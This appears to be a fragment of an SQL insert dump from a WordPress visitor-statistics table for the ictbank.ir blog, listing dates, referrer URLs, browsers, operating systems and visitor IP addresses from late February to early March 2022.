(19001,'2022-02-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.165.160','000',0,1,0),
(19002,'2022-02-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,7,0),
(19003,'2022-02-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(19004,'2022-02-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19005,'2022-02-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(19006,'2022-02-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19007,'2022-02-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(19008,'2022-02-27','http://ictbank.ir/','Chrome','Windows','6.2',NULL,NULL,'','113.227.196.2','000',0,1,0),
(19009,'2022-02-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.24.65','000',0,1,0),
(19010,'2022-02-28','http://www.ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','51.89.190.204','000',0,4,0),
(19011,'2022-02-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','103.97.201.128','000',0,2,0),
(19012,'2022-02-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','103.97.201.129','000',0,2,0),
(19013,'2022-02-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','103.233.83.71','000',0,6,0),
(19014,'2022-02-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','141.164.49.177','000',0,9,0),
(19015,'2022-02-28','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','154.72.116.227','000',0,1,0),
(19016,'2022-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.189','000',0,1,0),
(19017,'2022-02-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.169.253','000',0,2,0),
(19018,'2022-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','197.243.61.202','000',0,1,0),
(19019,'2022-02-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19020,'2022-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.115.246','000',0,1,0),
(19021,'2022-02-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,4,0),
(19022,'2022-02-28','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.21','000',0,1,0),
(19023,'2022-02-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.48','000',0,2,0),
(19024,'2022-02-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,2,0),
(19025,'2022-02-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.219.2','000',0,1,0),
(19026,'2022-02-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19027,'2022-02-28','http://www.ictbank.ir/blog','Chrome','Android','4.3',NULL,NULL,'','58.17.6.9','000',0,1,0),
(19028,'2022-02-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(19029,'2022-02-28','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,2,0),
(19030,'2022-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.83.5.15','000',0,2,0),
(19031,'2022-02-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.144.93.106','000',0,13,0),
(19032,'2022-02-28','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.144.172.98','000',0,2,0),
(19033,'2022-02-28','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','15.206.235.52','000',0,1,0),
(19034,'2022-02-28','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','176.9.8.180','000',0,9,0),
(19035,'2022-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(19036,'2022-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.227.32.154','000',0,1,0),
(19037,'2022-03-01','http://ictbank.ir/blog','Chrome','Android','8.1',NULL,NULL,'','152.32.168.210','000',0,1,0),
(19038,'2022-03-01','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','34.201.48.124','000',0,1,0),
(19039,'2022-03-01','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','69.64.55.92','000',0,25,0),
(19040,'2022-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','197.243.61.202','000',0,2,0),
(19041,'2022-03-01','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','217.165.11.120','000',0,1,0),
(19042,'2022-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','210.148.42.60','000',0,1,0),
(19043,'2022-03-01','https://www.google.hu/','Chrome','Windows','10.0',NULL,NULL,'','84.21.181.194','000',0,1,0),
(19044,'2022-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.144.222','000',0,1,0),
(19045,'2022-03-01','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','47.62.174.180','000',0,1,0),
(19046,'2022-03-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.101.158.178','000',0,1,0),
(19047,'2022-03-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(19048,'2022-03-01','https://www.google.com/','Firefox','OS X','10.15',NULL,NULL,'','194.125.20.118','000',0,1,0),
(19049,'2022-03-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.177','000',0,1,0),
(19050,'2022-03-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19051,'2022-03-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(19052,'2022-03-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(19053,'2022-03-01','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.88.24','000',0,1,0),
(19054,'2022-03-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(19055,'2022-03-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.79','000',0,2,0),
(19056,'2022-03-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(19057,'2022-03-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(19058,'2022-03-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19059,'2022-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(19060,'2022-03-02','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','54.227.32.154','000',0,1,0),
(19061,'2022-03-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.85.163.242','000',0,1,0),
(19062,'2022-03-02','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','128.199.255.158','000',0,2,0),
(19063,'2022-03-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.177.13','000',0,2,0),
(19064,'2022-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.10.75.15','000',0,1,0),
(19065,'2022-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.139.8','000',0,1,0),
(19066,'2022-03-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.21','000',0,1,0),
(19067,'2022-03-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,5,0),
(19068,'2022-03-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.134.144.129','000',0,1,0),
(19069,'2022-03-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19070,'2022-03-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.9.96','000',0,1,0),
(19071,'2022-03-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19072,'2022-03-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19073,'2022-03-02','http://www.ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','58.17.6.9','000',0,1,0),
(19074,'2022-03-02','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','187.189.95.103','000',0,1,0),
(19075,'2022-03-02','http://www.bing.com','Unknown','Unknown','Unknown',NULL,NULL,'','20.150.147.203','000',0,1,0),
(19076,'2022-03-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,4,0),
(19077,'2022-03-03','https://www.google.com.pe/','Chrome','Windows','10.0',NULL,NULL,'','201.234.52.37','000',0,1,0),
(19078,'2022-03-03','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.93','000',0,1,0),
(19079,'2022-03-03','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.78','000',0,1,0),
(19080,'2022-03-03','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.75','000',0,1,0),
(19081,'2022-03-03','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','185.54.230.171','000',0,5,0),
(19082,'2022-03-03','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','186.154.103.101','000',0,1,0),
(19083,'2022-03-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(19084,'2022-03-03','http://ictbank.ir/blog','Opera','Ubuntu','10.10',NULL,NULL,'','3.66.75.129','000',0,1,0),
(19085,'2022-03-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(19086,'2022-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(19087,'2022-03-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','54.227.32.154','000',0,1,0),
(19088,'2022-03-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.102.90','000',0,2,0),
(19089,'2022-03-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(19090,'2022-03-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','149.28.227.173','000',0,1,0),
(19091,'2022-03-03','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.80.192','000',0,7,0),
(19092,'2022-03-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(19093,'2022-03-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19094,'2022-03-03','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','209.120.227.2','000',0,1,0),
(19095,'2022-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.69.163','000',0,1,0),
(19096,'2022-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.244.238','000',0,1,0),
(19097,'2022-03-03','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','75.119.138.152','000',0,7,0),
(19098,'2022-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','126.194.202.164','000',0,1,0),
(19099,'2022-03-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.48','000',0,2,0),
(19100,'2022-03-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.174.204.137','000',0,2,0),
(19101,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(19102,'2022-03-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.227.32.154','000',0,1,0),
(19103,'2022-03-04','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,2,0),
(19104,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.204.244.202','000',0,1,0),
(19105,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.102.127.172','000',0,34,0),
(19106,'2022-03-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,9,0),
(19107,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','125.129.62.2','000',0,1,0),
(19108,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.149.251.162','000',0,1,0),
(19109,'2022-03-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(19110,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.121.15.108','000',0,1,0),
(19111,'2022-03-04','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','82.210.32.137','000',0,1,0),
(19112,'2022-03-04','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.144','000',0,6,0),
(19113,'2022-03-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(19114,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','208.78.106.47','000',0,1,0),
(19115,'2022-03-04','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.65','000',0,1,0),
(19116,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.61.28.220','000',0,1,0),
(19117,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.44.205','000',0,1,0),
(19118,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.80.190','000',0,1,0),
(19119,'2022-03-04','https://www.google.com/','Firefox','OS X','10.15',NULL,NULL,'','5.152.46.112','000',0,1,0),
(19120,'2022-03-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(19121,'2022-03-04','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.101.63.152','000',0,12,0),
(19122,'2022-03-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.82','000',0,2,0),
(19123,'2022-03-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(19124,'2022-03-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(19125,'2022-03-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,2,0),
(19126,'2022-03-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(19127,'2022-03-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.101.63.152','000',0,2,0),
(19128,'2022-03-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,1,0),
(19129,'2022-03-05','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','54.246.12.10','000',0,1,0),
(19130,'2022-03-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19131,'2022-03-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(19132,'2022-03-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.179.252.55','000',0,1,0),
(19133,'2022-03-05','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','64.124.51.154','000',0,2,0),
(19134,'2022-03-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.182.238.104','000',0,1,0),
(19135,'2022-03-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','110.54.148.100','000',0,1,0),
(19136,'2022-03-05','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','79.141.247.236','000',0,2,0),
(19137,'2022-03-05','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','31.59.142.206','000',0,4,0),
(19138,'2022-03-05','http://ictbank.ir/blog','Firefox','Windows','6.0',NULL,NULL,'','171.22.76.32','000',0,4,0),
(19139,'2022-03-05','http://ictbank.ir/blog','Chrome','Android','4.0.4',NULL,NULL,'','34.209.64.94','000',0,1,0),
(19140,'2022-03-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.88.230.58','000',0,1,0),
(19141,'2022-03-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.166.143.124','000',0,1,0),
(19142,'2022-03-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.27.173.145','000',0,1,0),
(19143,'2022-03-05','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','217.146.82.22','000',0,2,0),
(19144,'2022-03-05','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','136.158.119.29','000',0,1,0),
(19145,'2022-03-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.242.173','000',0,1,0),
(19146,'2022-03-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(19147,'2022-03-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(19148,'2022-03-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,2,0),
(19149,'2022-03-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19150,'2022-03-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.114','000',0,2,0),
(19151,'2022-03-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.105','000',0,2,0),
(19152,'2022-03-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(19153,'2022-03-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.243.218.46','000',0,1,0),
(19154,'2022-03-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(19155,'2022-03-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.103','000',0,4,0),
(19156,'2022-03-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,12,0),
(19157,'2022-03-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(19158,'2022-03-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.35.102','000',0,1,0),
(19159,'2022-03-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','120.29.86.100','000',0,1,0),
(19160,'2022-03-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','3.94.83.76','000',0,1,0),
(19161,'2022-03-06','http://82.102.9.14/blog','Chrome','Android','10.0',NULL,NULL,'','221.130.37.145','000',0,1,0),
(19162,'2022-03-06','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.133.192.122','000',0,1,0),
(19163,'2022-03-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(19164,'2022-03-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','191.101.200.142','000',0,2,0),
(19165,'2022-03-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.9.96','000',0,1,0),
(19166,'2022-03-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.107.112','000',0,1,0),
(19167,'2022-03-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19168,'2022-03-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19169,'2022-03-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.127.56.236','000',0,1,0),
(19170,'2022-03-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(19171,'2022-03-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','61.184.37.86','000',0,23,0),
(19172,'2022-03-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.50','000',0,2,0),
(19173,'2022-03-07','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','3.66.75.129','000',0,1,0),
(19174,'2022-03-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(19175,'2022-03-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(19176,'2022-03-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,5,0),
(19177,'2022-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.12','000',0,1,0),
(19178,'2022-03-07','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','41.190.137.90','000',0,1,0),
(19179,'2022-03-07','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','207.244.92.202','000',0,5,0),
(19180,'2022-03-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,2,0),
(19181,'2022-03-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.170','000',0,2,0),
(19182,'2022-03-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.145','000',0,2,0),
(19183,'2022-03-07','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','95.90.254.144','000',0,1,0),
(19184,'2022-03-07','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','125.119.222.233','000',0,1,0),
(19185,'2022-03-07','http://ictbank.ir/blog/wp-admin/edit-comments.php?paged=1','Chrome','OS X','10.15.7',NULL,NULL,'','5.236.174.5','000',0,2,0),
(19186,'2022-03-07','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(19187,'2022-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(19188,'2022-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.105.135','000',0,1,0),
(19189,'2022-03-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.13','000',0,2,0),
(19190,'2022-03-07','http://www.design-arena.ir','Chrome','Windows','10.0',NULL,NULL,'','198.244.220.113','000',0,2,0),
(19191,'2022-03-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.106','000',0,2,0),
(19192,'2022-03-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.107.112','000',0,1,0),
(19193,'2022-03-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(19194,'2022-03-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(19195,'2022-03-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(19196,'2022-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.198.68.67','000',0,2,0),
(19197,'2022-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','163.116.136.254','000',0,1,0),
(19198,'2022-03-07','https://www.google.com.mx/','Chrome','Windows','10.0',NULL,NULL,'','187.228.132.202','000',0,1,0),
(19199,'2022-03-07','http://www.bing.com','Unknown','Unknown','Unknown',NULL,NULL,'','51.38.41.15','000',0,1,0),
(19200,'2022-03-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.179','000',0,25,0),
(19201,'2022-03-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.11','000',0,2,0),
(19202,'2022-03-08','https://www.google.com.mx/','Chrome','Windows','10.0',NULL,NULL,'','187.228.132.202','000',0,1,0),
(19203,'2022-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.248.168.222','000',0,2,0),
(19204,'2022-03-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(19205,'2022-03-08','http://ictbank.ir/blog//wp-activate.php?sexx=sec','Chrome','Windows','10.0',NULL,NULL,'','217.26.150.133','000',0,7,0),
(19206,'2022-03-08','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.86.84.115','000',0,2,0),
(19207,'2022-03-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,7,0),
(19208,'2022-03-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(19209,'2022-03-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.114','000',0,2,0),
(19210,'2022-03-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','93.174.95.106','000',0,2,0),
(19211,'2022-03-08','http://ictbank.ir/blog','Chrome','Android','4.0.4',NULL,NULL,'','18.236.185.245','000',0,1,0),
(19212,'2022-03-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.24.46.230','000',0,1,0),
(19213,'2022-03-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.87.238.141','000',0,1,0),
(19214,'2022-03-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.88.249.160','000',0,1,0),
(19215,'2022-03-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.53','000',0,2,0),
(19216,'2022-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.250.156','000',0,1,0),
(19217,'2022-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.109','000',0,1,0),
(19218,'2022-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.101','000',0,1,0),
(19219,'2022-03-08','https://www.bing.com/','Chrome','Linux','Unknown',NULL,NULL,'','107.197.184.250','000',0,1,0),
(19220,'2022-03-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19221,'2022-03-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','107.191.47.0','000',0,1,0),
(19222,'2022-03-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19223,'2022-03-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(19224,'2022-03-08','http://ictbank.ir/blog','Safari','OS X','10.10.1',NULL,NULL,'','52.71.155.178','000',0,1,0),
(19225,'2022-03-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','171.25.193.77','000',0,1,0),
(19226,'2022-03-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','46.101.166.35','000',0,2,0),
(19227,'2022-03-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(19228,'2022-03-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.145','000',0,4,0),
